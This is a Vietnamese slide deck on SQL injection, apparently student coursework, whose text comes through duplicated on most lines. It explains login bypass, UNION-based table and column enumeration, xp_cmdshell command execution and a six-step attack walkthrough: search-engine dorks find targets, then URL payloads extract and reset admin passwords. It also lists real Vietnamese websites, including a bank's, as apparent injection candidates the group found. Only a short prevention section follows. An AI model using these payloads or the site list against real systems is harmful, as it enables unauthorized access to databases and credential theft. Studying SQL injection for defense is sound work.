Embed Size (px)
DESCRIPTION
Citation preview
SQL INJECTIONSQL INJECTION
Nội dung trình bày:Nội dung trình bày:
SQL Injection là gì?SQL Injection là gì?
Các dạng tấn công bằng SQL InjectionCác dạng tấn công bằng SQL Injection
Kỹ Thuật tấn công bằng sql injectionKỹ Thuật tấn công bằng sql injection
Cách phòng tránhCách phòng tránh
DemoDemo
SQL Injection là gì?SQL Injection là gì?
SQL injection là một kĩ thuật tấn công lợi dụng lỗ SQL injection là một kĩ thuật tấn công lợi dụng lỗ hổng trong việc kiểm tra dữ liệu nhập trong các ứng hổng trong việc kiểm tra dữ liệu nhập trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu để "tiêm vào" (injectidữ liệu để "tiêm vào" (injectionon) và thi hành các câu ) và thi hành các câu lệnh SQL bất hợp pháp.lệnh SQL bất hợp pháp.
Hậu quả của nó rất tai hại vì nó cho phép những kẻ Hậu quả của nó rất tai hại vì nó cho phép những kẻ tấn công có thể thực hiện các thao tác xóa, hiệu chỉnh, tấn công có thể thực hiện các thao tác xóa, hiệu chỉnh, do có toàn quyền trên cơ sở dữ liệu của ứng dụng, do có toàn quyền trên cơ sở dữ liệu của ứng dụng, thậm chí là server mà ứng dụng đó đang chạy. thậm chí là server mà ứng dụng đó đang chạy.
Lỗi này thường xảy ra trên các ứng dụng web có dữ Lỗi này thường xảy ra trên các ứng dụng web có dữ liệu được quản lí bằng các hệ quản trị cơ sở dữ liệu liệu được quản lí bằng các hệ quản trị cơ sở dữ liệu như SQL Server, MySQL, Oracle, DB2, Sysbase. như SQL Server, MySQL, Oracle, DB2, Sysbase.
Các dạng tấn công bằng SQL InjectionCác dạng tấn công bằng SQL Injection
Có bốn dạng thông thường bao gồm: Có bốn dạng thông thường bao gồm: Vượt qua kiểm tra lúc đăng nhập (authorization Vượt qua kiểm tra lúc đăng nhập (authorization
bypass)bypass) Sử dụng câu lện SELECT Sử dụng câu lện SELECT Sử dụng câu lệnh INSERT Sử dụng câu lệnh INSERT Sử dụng các stored-procedures [2], [3]Sử dụng các stored-procedures [2], [3]
Dạng tấn công vượt qua kiểm tra đăng Dạng tấn công vượt qua kiểm tra đăng nhậpnhập
Đăng nhập nhờ vào lỗi khi dùng các câu lệnh Đăng nhập nhờ vào lỗi khi dùng các câu lệnh SQL thao tác trên cơ sở dữ liệu của ứng dụng SQL thao tác trên cơ sở dữ liệu của ứng dụng web. web.
Trong trường hợp này, người ta có thể dùng Trong trường hợp này, người ta có thể dùng hai trang, một trang HTML để hiển thị form hai trang, một trang HTML để hiển thị form nhập liệu và một trang ASP dùng để xử lí nhập liệu và một trang ASP dùng để xử lí thông tin nhập từ phía người dùng. Ví dụ: thông tin nhập từ phía người dùng. Ví dụ:
login.htm login.htm
<form action="ExecLogin.asp" method="post"> <form action="ExecLogin.asp" method="post">
Username: <input type="text" Username: <input type="text" name="fUSRNAME"><br> name="fUSRNAME"><br>
Password: <input type="password" Password: <input type="password" name="fPASSWORD"><br> name="fPASSWORD"><br>
<input type="submit"> <input type="submit">
</form> </form>
execlogin.asp execlogin.asp <% <%
Dim vUsrName, vPassword, objRS, strSQL vUsrName = Dim vUsrName, vPassword, objRS, strSQL vUsrName = Request.Form("fUSRNAME") vPassword = Request.Form("fUSRNAME") vPassword = Request.Form("fPASSWORD") Request.Form("fPASSWORD")
strSQL = "SELECT * FROM T_USERS " & _ strSQL = "SELECT * FROM T_USERS " & _ "WHERE "WHERE USR_NAME=' " & vUsrName & _ USR_NAME=' " & vUsrName & _
" ' and USR_PASSWORD=' " & vPassword & " ' “" ' and USR_PASSWORD=' " & vPassword & " ' “
Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." strSQL, "DSN=..." If (objRS.EOF) Then If (objRS.EOF) Then
Response.Write "Invalid login." Response.Write "Invalid login." Else Else
Response.Write "You are logged in as " & Response.Write "You are logged in as " & objRS("USR_NAME") objRS("USR_NAME") End If End If
Set objRS = Nothing %> Set objRS = Nothing %>
Người dùng nhập chuỗi sau vào trong cả 2 ô Người dùng nhập chuỗi sau vào trong cả 2 ô nhập liệu username/password của trang nhập liệu username/password của trang login.htm là: login.htm là: ' OR ' ' = ' ' OR ' ' = ' . .
Lúc này, câu truy vấn sẽ được gọi thực hiện là: Lúc này, câu truy vấn sẽ được gọi thực hiện là: SELECT * FROM T_USERS WHERE SELECT * FROM T_USERS WHERE USR_NAME ='' OR ''='' and USR_NAME ='' OR ''='' and USR_PASSWORD= '' OR ''='' USR_PASSWORD= '' OR ''=''
Câu truy vấn này là hợp lệ và sẽ trả về tất cả Câu truy vấn này là hợp lệ và sẽ trả về tất cả các bản ghi của T_USERS và đoạn mã tiếp các bản ghi của T_USERS và đoạn mã tiếp theo xử lí người dùng đăng nhập bất hợp pháp theo xử lí người dùng đăng nhập bất hợp pháp này như là người dùng đăng nhập hợp lệ. này như là người dùng đăng nhập hợp lệ.
Dạng tấn công sử dụng câu lệnh Dạng tấn công sử dụng câu lệnh SELECTSELECT
Để thực hiện được kiểu tấn công này, kẻ tấn Để thực hiện được kiểu tấn công này, kẻ tấn công phải có khả năng hiểu và lợi dụng các sơ công phải có khả năng hiểu và lợi dụng các sơ hở trong các thông báo lỗi từ hệ thống để dò hở trong các thông báo lỗi từ hệ thống để dò tìm các điểm yếu khởi đầu cho việc tấn công. tìm các điểm yếu khởi đầu cho việc tấn công.
Thông thường, sẽ có một trang nhận ID của Thông thường, sẽ có một trang nhận ID của tin cần hiển thị rồi sau đó truy tin cần hiển thị rồi sau đó truy vấn nội dung của tin có ID này. vấn nội dung của tin có ID này.
<% <% Dim vNewsID, objRS, strSQL Dim vNewsID, objRS, strSQL vNewsID = Request("ID") vNewsID = Request("ID") strSQL = "SELECT * FROM T_NEWS strSQL = "SELECT * FROM T_NEWS WHERE NEWS_ID =" & vNewsID WHERE NEWS_ID =" & vNewsID Set objRS = Set objRS = Server.CreateObject("ADODB.Recordset") Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." objRS.Open strSQL, "DSN=..." Set objRS = Nothing Set objRS = Nothing
%> %>
Câu truy vấn SQL lúc này sẽ trả về tất cả các Câu truy vấn SQL lúc này sẽ trả về tất cả các article từ bảng dữ liệu vì nó sẽ thực hiện câu article từ bảng dữ liệu vì nó sẽ thực hiện câu lệnh:lệnh:
SELECT * FROM T_NEWS WHERE SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1NEWS_ID=0 or 1=1
'' UNION SELECT ALL SELECT OtherField UNION SELECT ALL SELECT OtherField FROM OtherTable WHEREFROM OtherTable WHERE ' ' ' '=='' (*) (*)
Lúc này, ngoài câu truy vấn đầu không thành công, Lúc này, ngoài câu truy vấn đầu không thành công, chương trình sẽ thực hiện thêm lệnh tiếp theo sau từ chương trình sẽ thực hiện thêm lệnh tiếp theo sau từ khóa UNION nữa. khóa UNION nữa.
Nếu chúng ta thêm ' UNION SELECT name Nếu chúng ta thêm ' UNION SELECT name FROM sysobjects WHERE xtype = 'U'FROM sysobjects WHERE xtype = 'U' là có thể là có thể liệt kê được tên tất cả các bảng dữ liệu. liệt kê được tên tất cả các bảng dữ liệu.
Dạng tấn công sử dụng câu lệnh Dạng tấn công sử dụng câu lệnh INSERTINSERT
Chức năng không thể thiếu là sau khi đăng kí Chức năng không thể thiếu là sau khi đăng kí thành công, người dùng có thể xem và hiệu thành công, người dùng có thể xem và hiệu chỉnh thông tin của mình. SQL injection có thể chỉnh thông tin của mình. SQL injection có thể được dùng khi hệ thống không kiểm tra tính được dùng khi hệ thống không kiểm tra tính hợp lệ của thông tin nhập vào. hợp lệ của thông tin nhập vào.
Ví dụ, một câu lệnh INSERT có thể có cú pháp dạng: Ví dụ, một câu lệnh INSERT có thể có cú pháp dạng: INSERT INTO TableName VALUES('Value One', INSERT INTO TableName VALUES('Value One', 'Value Two', 'Value Three'). Nếu đoạn mã xây dựng 'Value Two', 'Value Three'). Nếu đoạn mã xây dựng câu lệnh SQL có dạng : câu lệnh SQL có dạng :
<% strSQL = "INSERT INTO TableName <% strSQL = "INSERT INTO TableName VALUES(' " & strValueOne & " ', ' " _ & VALUES(' " & strValueOne & " ', ' " _ & strValueTwo & " ', ' " & strValueThree & " ') " Set strValueTwo & " ', ' " & strValueThree & " ') " Set objRS = Server.CreateObject("ADODB.Recordset") objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." objRS.Open strSQL, "DSN=..." Set objRS = Set objRS = Nothing %> Nothing %>
Dạng tấn công sử dụng stored-Dạng tấn công sử dụng stored-proceduresprocedures
Việc tấn công bằng stored-procedures sẽ gây Việc tấn công bằng stored-procedures sẽ gây tác hại rất lớn nếu ứng dụng được thực thi với tác hại rất lớn nếu ứng dụng được thực thi với quyền quản trị hệ thốngquyền quản trị hệ thống 'sa' 'sa'..
Ví dụ, nếu ta thay đoạn mã tiêm vào dạng:Ví dụ, nếu ta thay đoạn mã tiêm vào dạng: ' ; ' ; EXEC xp_cmdshell 'cmd.exe dir C: '.EXEC xp_cmdshell 'cmd.exe dir C: '.
Lúc này hệ thống sẽ thực hiện lệnh liệt kê thư Lúc này hệ thống sẽ thực hiện lệnh liệt kê thư mục trên ổ đĩa C:\ cài đặt server. Việc phá hoại mục trên ổ đĩa C:\ cài đặt server. Việc phá hoại kiểu nào tuỳ thuộc vào câu lệnh đằng sau kiểu nào tuỳ thuộc vào câu lệnh đằng sau cmd.exe. cmd.exe.
Kỹ Thuật tấn công bằng sql injectionKỹ Thuật tấn công bằng sql injection
Bước 1: Tìm kiếm mục tiêu.Bước 1: Tìm kiếm mục tiêu. Bước 2: Kiểm tra chỗ yếu của trang webBước 2: Kiểm tra chỗ yếu của trang web Bước 3: Nhận data qua ‘database using ODBC Bước 3: Nhận data qua ‘database using ODBC
error message’error message’ Bước 4: Xác định tên của các column trong Bước 4: Xác định tên của các column trong
tabletable Bước 5: Thu thập các dữ liệu quan trọng.Bước 5: Thu thập các dữ liệu quan trọng. Bước 6: Xử lý kết quả tìm đượcBước 6: Xử lý kết quả tìm được
Tìm kiếm mục tiêuTìm kiếm mục tiêu
Bạn có thể dùng các bất kỳ một search-engine Bạn có thể dùng các bất kỳ một search-engine nào trên mạng như các trang login, search, nào trên mạng như các trang login, search, feedback…feedback…
Bạn có thể “custome Search Engine” lại cho Bạn có thể “custome Search Engine” lại cho phù hợp với yêu cầu của bạnphù hợp với yêu cầu của bạn
Thực hiện câu lệnh search:Thực hiện câu lệnh search: inurl:php?id= site:com.vninurl:php?id= site:com.vn
Đây là kết quả thu được.Đây là kết quả thu được.
Kết Quả Tìm Được Của NhómKết Quả Tìm Được Của Nhóm http://www.vsmc.com.vn/news_detail.php?id=19'http://www.vsmc.com.vn/news_detail.php?id=19' http://www.toeic.com.vn/info/details.php?id=383'http://www.toeic.com.vn/info/details.php?id=383' http://www.phanhoadigi.com.vn/list_product.php?http://www.phanhoadigi.com.vn/list_product.php?
ID=1173&namecate=EOS'ID=1173&namecate=EOS' http://forum.key.com.vn/viewtopic.php?id=362http://forum.key.com.vn/viewtopic.php?id=362 http://www.biconsi.com.vn/index.php?id=36'http://www.biconsi.com.vn/index.php?id=36' http://www.vietphone.com.vn/download.php?mode=download&id=19'http://www.vietphone.com.vn/download.php?mode=download&id=19' http://thammyvienthanhbinh.com.vn/detail.php?id=19'http://thammyvienthanhbinh.com.vn/detail.php?id=19' http://www.voip.com.vn/download.php?mode=download&id=28'http://www.voip.com.vn/download.php?mode=download&id=28'
http://bidv.com.vn/advert.asp?id=36'http://bidv.com.vn/advert.asp?id=36' http://www.licogi.com.vn/home.asp?ID=234&Langid=2%27http://www.licogi.com.vn/home.asp?ID=234&Langid=2%27 http://www.galilcol.ac.il/page.asp?id=17http://www.galilcol.ac.il/page.asp?id=17‘‘ Ghi chú: không phải trang nào cũng tấn công đượcGhi chú: không phải trang nào cũng tấn công được
Kiểm tra chỗ yếu của trang webKiểm tra chỗ yếu của trang web
Bạn có thể điền thêm một số lệnh trên url, Bạn có thể điền thêm một số lệnh trên url, hoặc trên các from login, search, hoặc search hoặc trên các from login, search, hoặc search để phát hiện lỗi.để phát hiện lỗi.
Sau đây là một số cách thêm và phát hiện lỗi Sau đây là một số cách thêm và phát hiện lỗi của nhóm mình:của nhóm mình:
Nhận data qua ‘database using Nhận data qua ‘database using ODBC error message’ODBC error message’
Đây là bước quan trọng nhất và đòi hỏi nhiều kĩ Đây là bước quan trọng nhất và đòi hỏi nhiều kĩ thuật lẫn sự am hiểu về cơ sở dữ liệu.thuật lẫn sự am hiểu về cơ sở dữ liệu.
Table INFORMATION_SCHEMA.COLUMNS Table INFORMATION_SCHEMA.COLUMNS chứa tên của tất cả các column trong table. Bạn chứa tên của tất cả các column trong table. Bạn có thể khai thác như sau:có thể khai thác như sau:http://vitcon/index.asp?id=10http://vitcon/index.asp?id=10 UNION SELECT UNION SELECT TOP 1 COLUMN_NAME FROM TOP 1 COLUMN_NAME FROM INFORMATION_SHEMA.COLUMNS INFORMATION_SHEMA.COLUMNS WHERE TABLE_NAME=‘admin_login’--WHERE TABLE_NAME=‘admin_login’--
Out put:Out put:
Microsoft OLE DB Provider for ODBC Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’[Microsoft][ODBC Drivers error ‘80040e07’[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the items must appear in the select list if the statement contains a UNION operator.statement contains a UNION operator.
/index.asp, line 5/index.asp, line 5
Thu thập các dữ liệu quan trọngThu thập các dữ liệu quan trọng
Chúng ta phải xác định được các tên của các Chúng ta phải xác định được các tên của các table và column quan trọng.table và column quan trọng.
Chúng ta có thể lấy login_name đầu tiên trong Chúng ta có thể lấy login_name đầu tiên trong table “admin_login” như sau:table “admin_login” như sau:
http://vitcon/index.asp?id=10http://vitcon/index.asp?id=10 UNION UNION SELECT TOP 1 login_name From SELECT TOP 1 login_name From admin_login—admin_login—
Bạn dễ dàng nhận ra được admin user đầu tiên Bạn dễ dàng nhận ra được admin user đầu tiên có login_name là ‘aaa’.có login_name là ‘aaa’.
Sau đó dung tên user tìm được để tìm password:Sau đó dung tên user tìm được để tìm password: http://vitcon/index.asp?id=10http://vitcon/index.asp?id=10 UNION SELECT UNION SELECT
TOP 1 password FROM admin_login where TOP 1 password FROM admin_login where login _name=‘aaa’—login _name=‘aaa’—
Bây giờ bạn sẽ nhận được password của ‘aaa’ là Bây giờ bạn sẽ nhận được password của ‘aaa’ là ‘bbb’.‘bbb’.
Xử lý kết quả tìm đượcXử lý kết quả tìm được
Khi bạn đã có tên của tất cả các column trong table, Khi bạn đã có tên của tất cả các column trong table, bạn có thể UPDATE hoặc INSERT một record mới bạn có thể UPDATE hoặc INSERT một record mới vào table này.vào table này.
Để thay đổi password của ‘aaa’ bạn có thể làm như Để thay đổi password của ‘aaa’ bạn có thể làm như sau:sau:
http://vitcon/index.asp?id=10 ;UPDATE http://vitcon/index.asp?id=10 ;UPDATE ‘admin_login’ SET ‘password’ =‘ccc’ WHERE ‘admin_login’ SET ‘password’ =‘ccc’ WHERE login_name=‘aaa’– login_name=‘aaa’–
Hoặc bạn login trực tiếp vào và thực hiện dưới quyền Hoặc bạn login trực tiếp vào và thực hiện dưới quyền user đó.user đó.
Cách phòng tránhCách phòng tránh
Cần có cơ chế kiểm soát chặt chẽ và giới hạn Cần có cơ chế kiểm soát chặt chẽ và giới hạn quyền xử lí dữ liệu đến tài khoản người dùng quyền xử lí dữ liệu đến tài khoản người dùng mà ứng dụng web đang sử dụng.mà ứng dụng web đang sử dụng.
Các ứng dụng thông thường nên tránh dùng Các ứng dụng thông thường nên tránh dùng đến các quyền như dbo hay sa. Quyền càng bị đến các quyền như dbo hay sa. Quyền càng bị hạn chế, thiệt hại càng ít. hạn chế, thiệt hại càng ít.
Loại bỏ bất kì thông tin kĩ thuật nào chứa Loại bỏ bất kì thông tin kĩ thuật nào chứa trong thông điệp chuyển xuống cho người trong thông điệp chuyển xuống cho người dùng khi ứng dụng có lỗi.dùng khi ứng dụng có lỗi.
Các thông báo lỗi thông thường tiết lộ các chi Các thông báo lỗi thông thường tiết lộ các chi tiết kĩ thuật có thể cho phép kẻ tấn công biết tiết kĩ thuật có thể cho phép kẻ tấn công biết được điểm yếu của hệ thống. được điểm yếu của hệ thống.
DEMODEMO
